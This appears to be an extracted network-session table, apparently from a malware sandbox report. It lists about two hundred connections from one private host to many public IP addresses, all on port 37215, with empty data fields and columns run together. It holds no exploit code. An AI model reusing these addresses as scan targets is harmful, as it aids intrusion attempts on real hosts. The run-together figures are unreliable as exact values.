                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19199192.168.2.136043441.145.36.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19200192.168.2.1356322157.85.82.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19201192.168.2.1359898149.154.23.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19202192.168.2.1345676157.109.21.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19203192.168.2.133371241.129.14.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19204192.168.2.135621441.114.166.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19205192.168.2.1349108157.109.112.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19206192.168.2.134958441.3.117.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19207192.168.2.133952641.112.77.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19208192.168.2.1357580151.50.20.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19209192.168.2.1342174197.95.139.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19210192.168.2.134630641.222.143.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19211192.168.2.1338828157.104.196.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19212192.168.2.1333006197.13.243.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19213192.168.2.1341464157.79.151.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19214192.168.2.135247641.223.84.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19215192.168.2.135633841.94.174.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19216192.168.2.1356110126.179.249.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19217192.168.2.1336586210.207.151.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19218192.168.2.1342466197.215.157.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19219192.168.2.1340596168.137.167.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19220192.168.2.1341176197.23.127.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19221192.168.2.135754045.221.103.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19222192.168.2.1339534157.176.251.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19223192.168.2.1333006157.233.235.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19224192.168.2.133880841.74.107.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19225192.168.2.1340850144.207.222.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19226192.168.2.133731241.241.71.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19227192.168.2.1351254157.209.1.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19228192.168.2.1358126113.134.181.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19229192.168.2.133989441.162.48.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19230192.168.2.1359324197.45.72.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19231192.168.2.134284841.124.168.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19232192.168.2.134224641.4.128.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19233192.168.2.1355206157.245.90.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19234192.168.2.133988241.29.35.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19235192.168.2.1349148157.182.22.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19236192.168.2.133475241.221.4.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19237192.168.2.1343848197.218.28.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19238192.168.2.135462841.89.107.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19239192.168.2.1355580157.118.168.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19240192.168.2.1343638135.28.238.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19241192.168.2.1345848110.52.158.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19242192.168.2.1338268197.118.48.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19243192.168.2.1333822197.134.164.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19244192.168.2.1333260157.81.11.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19245192.168.2.1344642197.148.226.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19246192.168.2.13338708.217.169.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19247192.168.2.1349274121.205.187.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19248192.168.2.1348412197.205.118.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19249192.168.2.1339762197.128.2.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19250192.168.2.1339136197.20.14.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19251192.168.2.136070427.229.46.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19252192.168.2.1349866197.42.120.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19253192.168.2.1335652197.132.189.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19254192.168.2.1356036157.101.93.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19255192.168.2.1336502197.207.162.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19256192.168.2.1343190157.250.155.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19257192.168.2.1355750157.41.47.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19258192.168.2.134775423.161.181.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19259192.168.2.1334658197.187.231.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19260192.168.2.133636467.54.162.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19261192.168.2.1334020197.144.50.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19262192.168.2.135733441.151.232.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19263192.168.2.1357174157.68.217.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19264192.168.2.1335186157.182.11.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19265192.168.2.1337438157.73.139.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19266192.168.2.133924041.160.219.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19267192.168.2.1354226197.142.129.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19268192.168.2.1334604105.199.104.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19269192.168.2.1343866197.99.148.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19270192.168.2.1337482197.147.38.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19271192.168.2.1353500157.180.33.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19272192.168.2.1340270109.203.115.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19273192.168.2.136053041.242.223.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19274192.168.2.1360146197.132.213.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19275192.168.2.1360082157.210.6.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19276192.168.2.135049441.115.164.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19277192.168.2.134320041.244.104.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19278192.168.2.134900841.85.157.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19279192.168.2.1358912197.206.247.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19280192.168.2.1344670157.136.28.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19281192.168.2.1345614197.120.121.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19282192.168.2.133777441.66.147.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19283192.168.2.1340384157.103.169.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19284192.168.2.1350668197.186.96.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19285192.168.2.134120241.68.0.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19286192.168.2.1346140176.5.84.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19287192.168.2.1353806157.152.236.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19288192.168.2.1344574197.17.25.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19289192.168.2.135061041.93.6.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19290192.168.2.135441041.10.117.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19291192.168.2.1357766157.19.230.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19292192.168.2.134362690.226.124.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19293192.168.2.133681096.5.219.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19294192.168.2.1349630157.134.168.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19295192.168.2.1339288157.194.50.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19296192.168.2.1348874157.227.116.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19297192.168.2.1339660157.148.32.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19298192.168.2.134330041.16.47.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19299192.168.2.1336606155.227.10.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19300192.168.2.1342212157.12.27.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19301192.168.2.1336342157.175.90.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19302192.168.2.133898841.37.129.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19303192.168.2.1357330197.178.44.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19304192.168.2.1336338197.252.219.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19305192.168.2.134412619.100.59.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19306192.168.2.1360634157.54.107.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19307192.168.2.1348508157.143.75.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19308192.168.2.1344380197.203.141.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19309192.168.2.1358218157.162.145.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19310192.168.2.1334774125.202.191.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19311192.168.2.135039457.201.40.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19312192.168.2.1339150197.243.24.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19313192.168.2.1343750157.62.32.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19314192.168.2.1359038157.63.130.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19315192.168.2.135855646.136.79.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19316192.168.2.134415241.98.120.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19317192.168.2.13519885.19.43.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19318192.168.2.134208441.79.229.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19319192.168.2.1346312197.65.135.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19320192.168.2.1336084118.245.45.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19321192.168.2.134860293.147.72.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19322192.168.2.1342200170.98.22.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19323192.168.2.1334322142.7.68.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19324192.168.2.1360510131.14.236.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19325192.168.2.1352512157.233.19.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19326192.168.2.134270641.20.148.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19327192.168.2.135487041.66.195.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19328192.168.2.1334816157.57.187.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19329192.168.2.1351466157.15.233.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19330192.168.2.133998641.110.9.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19331192.168.2.1353564157.50.164.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19332192.168.2.1333986197.76.75.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19333192.168.2.133835641.239.233.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19334192.168.2.135174641.97.195.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19335192.168.2.135404481.215.22.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19336192.168.2.1358826157.187.87.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19337192.168.2.1354462157.170.44.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19338192.168.2.134658884.3.96.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19339192.168.2.1356522157.142.137.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19340192.168.2.1353432197.106.254.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19341192.168.2.13367122.138.174.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19342192.168.2.1338058197.162.32.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19343192.168.2.1351470157.191.226.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19344192.168.2.1347754157.80.228.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19345192.168.2.1351934157.20.202.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19346192.168.2.133652241.131.38.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19347192.168.2.1339870157.60.188.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19348192.168.2.1340540197.22.24.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19349192.168.2.1356838157.35.36.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19350192.168.2.1344468197.113.164.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19351192.168.2.1334810211.182.15.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19352192.168.2.135698441.238.89.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19353192.168.2.133816232.76.183.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19354192.168.2.1359472203.192.63.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19355192.168.2.133905041.182.205.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19356192.168.2.1344680157.209.145.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19357192.168.2.1359886151.80.192.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19358192.168.2.1348974197.242.25.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19359192.168.2.133762462.212.179.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19360192.168.2.135840288.244.41.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19361192.168.2.1333416112.238.136.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19362192.168.2.1333274210.113.52.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19363192.168.2.1342842156.66.187.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19364192.168.2.1350192220.51.145.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19365192.168.2.134865698.131.125.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19366192.168.2.136071241.160.171.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19367192.168.2.1357970197.94.150.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19368192.168.2.133681041.91.119.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19369192.168.2.1336670157.241.203.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19370192.168.2.1350200157.56.240.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19371192.168.2.135464841.123.2.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19372192.168.2.134838241.198.251.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19373192.168.2.135692441.165.242.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19374192.168.2.134759012.251.79.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19375192.168.2.136037441.240.224.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19376192.168.2.1345026197.202.148.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19377192.168.2.1334054157.104.164.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19378192.168.2.1359428197.82.215.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19379192.168.2.133998641.29.26.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19380192.168.2.134715064.240.10.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19381192.168.2.134273841.73.45.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19382192.168.2.1343284197.18.118.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19383192.168.2.1340642197.12.127.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19384192.168.2.135534641.132.70.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19385192.168.2.1332930197.52.248.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19386192.168.2.1356826197.62.205.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19387192.168.2.135595441.44.24.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19388192.168.2.1336368124.188.179.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19389192.168.2.1357268157.255.87.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19390192.168.2.135366041.170.211.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19391192.168.2.133411841.181.243.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19392192.168.2.1337574174.155.230.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19393192.168.2.135702886.170.193.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19394192.168.2.1360964157.165.198.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19395192.168.2.135951441.98.191.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19396192.168.2.1333774197.228.51.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19397192.168.2.135411241.92.168.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19398192.168.2.135106241.31.164.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19399192.168.2.134677041.121.84.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19400192.168.2.134037457.48.201.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19401192.168.2.134516693.10.145.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19402192.168.2.1344072180.0.136.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19403192.168.2.134652241.58.155.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19404192.168.2.1353350157.80.16.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19405192.168.2.135449238.152.218.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19406192.168.2.1350242165.122.252.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19407192.168.2.1358052113.71.97.14137215
                                                  TimestampBytes transferredDirectionData


